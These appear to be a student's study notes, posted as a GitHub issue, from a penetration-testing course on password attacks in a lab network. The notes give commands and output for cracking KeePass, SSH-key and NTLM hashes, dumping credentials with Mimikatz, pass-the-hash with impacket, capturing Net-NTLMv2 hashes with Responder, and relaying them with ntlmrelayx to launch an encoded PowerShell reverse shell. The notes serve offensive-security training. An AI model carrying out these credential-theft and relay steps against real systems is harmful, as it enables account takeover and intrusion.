Open WDavid404 opened 10 months ago
Hydra tool we use the popular rockyou.txt wordlist, which contains over 14 million passwords.
https://github.com/WDavid404/Note_tryhackme/issues/6#issuecomment-1783801795
kali@kali:~$ echo -n "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" | wc -c
62
kali@kali:~$ python3 -c "print(62**5)"
916132832
For a five-character password and the specified character set, we have a keyspace of 916,132,832.
Benchmark CPU with MD5, SHA1, and SHA2-256
GPU and CPU hash rates. ALGORITHM | GPU | CPU |
---|---|---|
MD5 | 68,185.1 MH/s | 450.8 MH/s |
SHA1 | 21,528.2 MH/s | 298.3 MH/s |
SHA256 | 9,276.3 MH/s | 134.2 MH/s |
1 MH/s equals 1,000,000 hashes per second.
In this example, we'll calculate the cracking time for SHA256 with the keyspace of 916,132,832
kali@kali:~$ python3 -c "print(916132832 / 134200000)"
6.826623189269746
kali@kali:~$ python3 -c "print(916132832 / 9276300000)"
0.09876058687192092
hashcat https://github.com/WDavid404/Note_tryhackme/issues/6#issuecomment-1783748264
We can identify the hash type with hash-identifier or hashid which are installed on Kali.
The KeePass database is stored as a .kdbx file
PS C:\Users\jason> Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Directory: C:\Users\jason\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/30/2022 8:19 AM 1982 Database.kdbx
On kaili,Let's use the keepass2john script to format the database file and save the output to keepass.hash.
kali@kali:~/passwordattacks$ ls -la Database.kdbx
-rwxr--r-- 1 kali kali 1982 May 30 06:36 Database.kdbx
kali@kali:~/passwordattacks$ keepass2john Database.kdbx > keepass.hash
## use the keepass2john script to format the database file and save the output to keepass.hash
kali@kali:~/passwordattacks$ cat keepass.hash
Database:$keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e55337ff001ddfac98c961219d942fb0cfba*5273cc73b9584fbd843d1ee309d2ba47*1dcad0a3e50f684510c5ab14e1eecbb63671acae14a77eff9aa319b63d71ddb9*17c3ebc9c4c3535689cb9cb501284203b7c66b0ae2fbf0c2763ee920277496c1
!Remove the "Database:" string with a text editor !
kali@kali:~/passwordattacks$ hashcat --help | grep -i "KeePass"
13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) | Password Manager
kali@kali:~/passwordattacks$ hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
( Note: 加上 --potfile-disable 可以让hashcat重新跑crack而无视之前的记录,比较费时)
Let's run KeePass over our RDP connection and when prompted, enter the password.
We opened KeePass with the cracked password. Now we have access to all the user's stored passwords!
a passphrase is required when ssh login
kali@kali:~/passwordattacks$ ssh -i id_rsa -p 2222 dave@192.168.50.201
Enter passphrase for key 'id_rsa':
Enter passphrase for key 'id_rsa':
Enter passphrase for key 'id_rsa':
use the ssh2john transformation script from the JtR suite and save the resulting hash to ssh.hash.
Ssh2john is part of John The Reaper suite. it convert the private key into a hash that can be cracked by the password cracking tool John the Ripper.
kali@kali:~/passwordattacks$ ssh2john id_rsa > ssh.hash
kali@kali:~/passwordattacks$ cat ssh.hash
id_rsa:$sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e7373682d6b65792d7631000000000a6165733235362d6374720000000662637279707400000018000000107059e78a8d3764ea1e883fcdf592feb7000000100000000100000197000000077373682...
Within this output, "$6$" signifies SHA-512. As before, we'll remove the filename ('id_rsa:') before the first colon. Then, we'll determine the correct Hashcat mode.
Create a rule file and prepare a wordlist to crack the hash: We know "New password policy starting in January 2022. Passwords need 3 numbers, a capital letter and a special character" Create a rule based on the giving note.txt (对象用户曾使用过首字母大写,数字137. 另外我们再加上几个常用的特殊字符)
kali@kali:~/passwordattacks$ cat ssh.rule
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#
create a wordlist file containing the passwords from note.txt and save the output to ssh.passwords.
kali@kali:~/passwordattacks$ cat ssh.passwords
Window
rickc137
dave
superdave
megadave
umbrella
_use Hashcat to perform the cracking
kali@kali:~/passwordattacks$ hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force
Unfortunately, it didn't work( Reason: the modern private keys and their corresponding passphrases are created with the aes-256-ctr cipher, which Hashcat's mode 22921 does not support)_
so, we can use John the Ripper (JtR) that handle this cipher.
need to add a name for the rules and append them to the /etc/john/john.conf
configuration file.
(name the rule sshRules with a "List.Rules" rule naming syntax)
kali@kali:~/passwordattacks$ cat ssh.rule
[List.Rules:sshRules]
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#
kali@kali:~/passwordattacks$ sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'
## Note: use '>>' to attend a new rule content.
kali@kali:~/passwordattacks$ john --wordlist=ssh.passwords --rules=sshRules ssh.hash
ssh2john id_rsa > ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
Windows stores hashed user passwords in the Security Account Manager (SAM)1 database file, which is used to authenticate local or remote users.
On modern systems, the hashes in the SAM are stored as NTLM hashes.
SAM database is C:\Windows\system32\config\sam
Mimikatz tool Minikatz tool provides the functionality to extract plain-text passwords and password hashes from various sources in Windows and leverage them in further attacks like pass-the-hash. Mimikatz also includes the sekurlsa module, which extracts password hashes from the Local Security Authority Subsystem (LSASS) process memory. LSASS is a process in Windows that handles user authentication, password changes, and access token creation. LSASS is important for us because it caches NTLM hashes and other credentials, which we can extract using the sekurlsa Mimikatz module.
we can only extract passwords if we are running Mimikatz as Administrator (or higher) and have the SeDebugPrivilege access right enabled.
We can also elevate our privileges to the SYSTEM account with tools like PsExec11 or the built-in Mimikatz token elevation function12 to obtain the required privileges. The token elevation function requires the SeImpersonatePrivilege13 access right to work, but all local administrators have it by default.
We'll begin by using Get-LocalUser14 to check which users exist locally on the system.
PS C:\Users\offsec> Get-LocalUser
The output above indicates the existence of another user named nelly on the MARKETINGWK01 system. Our goal in this example is to obtain nelly's plain text password by retrieving the NTLM hash and cracking it.
Let's start PowerShell as administrator and start Mimikatz.
PS C:\Windows\system32> cd C:\tools
PS C:\tools> .\mimikatz.exe
To extract passwords from the system:
we can use sekurlsa::logonpasswords
, which attempts to extract plaintext passwords and password hashes from all available sources. Since this generates a huge amount of output, we'll instead use lsadump::sam
Usage:
mimikatz # privilege::debug
mimikatz # token::elevate ## to elevate to SYSTEM user privileges.
mimikatz # lsadump::sam
Let's copy the NTLM hash and paste it into nelly.hash and crack it.
kali@kali:~/passwordattacks$ cat nelly.hash
3ae8e5f0ffabb3a627672e1600f1ba10
kali@kali:~/passwordattacks$ hashcat --help | grep -i "ntlm"
....
1000 | NTLM | Operating System
...
kali@kali:~/passwordattacks$ hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Depending on the strength of the password, the hash cracking may be time-consuming or unfeasible. we'll demonstrate how we can leverage an NTLM hash without cracking it.
pass-the-hash (PtH) technique To leverage pass-the-hash (PtH), we need tools that support authentication with NTLM hashes.
For SMB enumeration and management, we can use smbclient or CrackMapExec. For command execution, we can use the scripts from the impacket library like psexec.py and wmiexec.py. In our lession, gain access to an SMB share by providing an NTLM hash, we'll use smbclient.
kali@kali:~$ smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
## the hash here is Administrator's hash and got by using mimikatz.
To execute psexec, we can enter impacket-psexec with two arguments. The first argument is -hashes, which allows us to use NTLM hashes to authenticate to the target. The format is "LMHash:NTHash", in which we specify the Administrator NTLM hash after the colon. Since we only use the NTLM hash, we can fill the LMHash section with 32 0's.
kali@kali:~$ impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
We can also use one of the other impacket scripts like wmiexec.py to obtain a shell as the user we used for authentication.
kali@kali:~$ impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
files02\administrator
In this example, our goal is to gain access to an SMB share on a Windows 2022 server from a Windows 11 client via Net-NTLMv2. Net-NTLMv2 is less secure than the more modern Kerberos protocol. This is common in the real-world since the majority of Windows environments still rely on the older protocol, especially as a way to support older devices that may not support Kerberos.
Responder tool It includes a built-in SMB server that handles the authentication process for us and prints all captured Net-NTLMv2 hashes.
In the example, Let's assume we used an attack vector to execute a bind shell on the target system.
The output shows the bind shell runs as the user paul, which is not a local administrator on the FILES01 system. Interestingly, the paul user is a member of the Remote Desktop Users group, which allows the user to connect to the system with RDP. In this case, we only have access to paul on this system. Since we don't have privileges to run Mimikatz, we cannot extract passwords from the system. But we can set up an SMB server with Responder on our Kali machine, then connect to it with the user paul and crack the Net-NTLMv2 hash, which is used in the authentication process.
First, we'll need to run ip a to retrieve a list of all interfaces. Then, we'll run responder (which is already pre-installed on Kali) as sudo to enable permissions needed to handle privileged raw socket operations for the various protocols. We'll set the listening interface with -I
Our next step is to request access to a non-existent SMB share on our Responder SMB server using paul's bind shell. We'll do this with a simple dir listing of \192.168.119.2\test (是Kali machine的IP), in which "test" is an arbitrary directory name. We are only interested in the authentication process, not a share listing. Let's switch back to the terminal tab containing our Netcat bind shell connection and enter the command.
The Responder tab should show the following:
这一步是模拟场景让Paul用户访问SMB folder输入真实的login authentication信息,从而Sponder可以捕获到Net-NTLM hash。
We'll save this to paul.hash so we can crack it with Hashcat. Before we start cracking, let's retrieve the correct mode.
crack the hash using the rockyou.txt wordlist.
we successfully connected to FILES01 with RDP as paul.
可以加上 -v ,这样就能重复看之前的hash内容了 https://myexploit.wordpress.com/responder-py/
Use ‘john --show
Capture /upload request with Burp and change the filename paremeter in post request to include UNC path which should trigger a SMB authentication to your kali SMB server: \\Kali_IP\test
In this section, we'll have access to FILES01 as an unprivileged user (files02admin), which means we cannot run Mimikatz to extract passwords. Using the steps from the previous section, imagine we obtained the Net-NTLMv2 hash, but couldn't crack it because it was too complex. What we can assume based on the username is that the user may be a local administrator on FILES02. Therefore, we can try to use the hash on another machine in what is known as a relay attack. In this attack, we'll again use the dir command in the bind shell to create an SMB connection to our Kali machine. Instead of merely printing the Net-NTLMv2 hash used in the authentication step, we'll forward it to FILES02. If files02admin is a local user of FILES02, the authentication is valid and therefore accepted by the machine. If the relayed authentication is from a user with local administrator privileges, we can use it to authenticate and then execute commands over SMB with methods similar to those used by psexec or wmiexec.
we can use with the pre-installed impacket-ntlmrelayx package. We'll use --no-http-server to disable the HTTP server since we are relaying an SMB connection and -smb2support to add support for SMB2.
kali@kali:~$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
Note: 192.168.50.212 is FILES02's IP. "JABjAGwAaQBlAG4AdA..." is the base64-encoded PowerShell reverse shell one-liner.
Next, we'll start a Netcat listener on port 8080 (in a new terminal tab) to catch the incoming reverse shell.
kali@kali:~$ nc -nvlp 8080
listening on [any] 8080 ...
Now we'll run Netcat in another terminal to connect to the bind shell on FILES01 (port 5555). After we connect, we'll enter dir \192.168.119.2\test to create an SMB connection to our Kali machine. Again, the remote folder name is arbitrary.
kali@kali:~$ nc 192.168.50.211 5555
Microsoft Windows [Version 10.0.20348.707]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
files01\files02admin
C:\Windows\system32>dir \\192.168.119.2\test
...
We should receive an incoming connection in our ntlmrelayx tab.
[*] SMBD-Thread-4: Received connection from 192.168.50.211, attacking target smb://192.168.50.212
[*] Authenticating against smb://192.168.50.212 as FILES01/FILES02ADMIN SUCCEED
[*] SMBD-Thread-6: Connection from 192.168.50.211 controlled, but there are no more targets left!
...
[*] Executed specified command on host: 192.168.50.212
The output indicates that ntlmrelayx received an SMB connection and used it to authenticate to our target by relaying it. After successfully authenticating, our command was executed on the target. Our Netcat listener should have caught the reverse shell.
Reference:
Summary
Attacking network services logins:
Password Cracking Fundamentals: Database.kdbx
hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."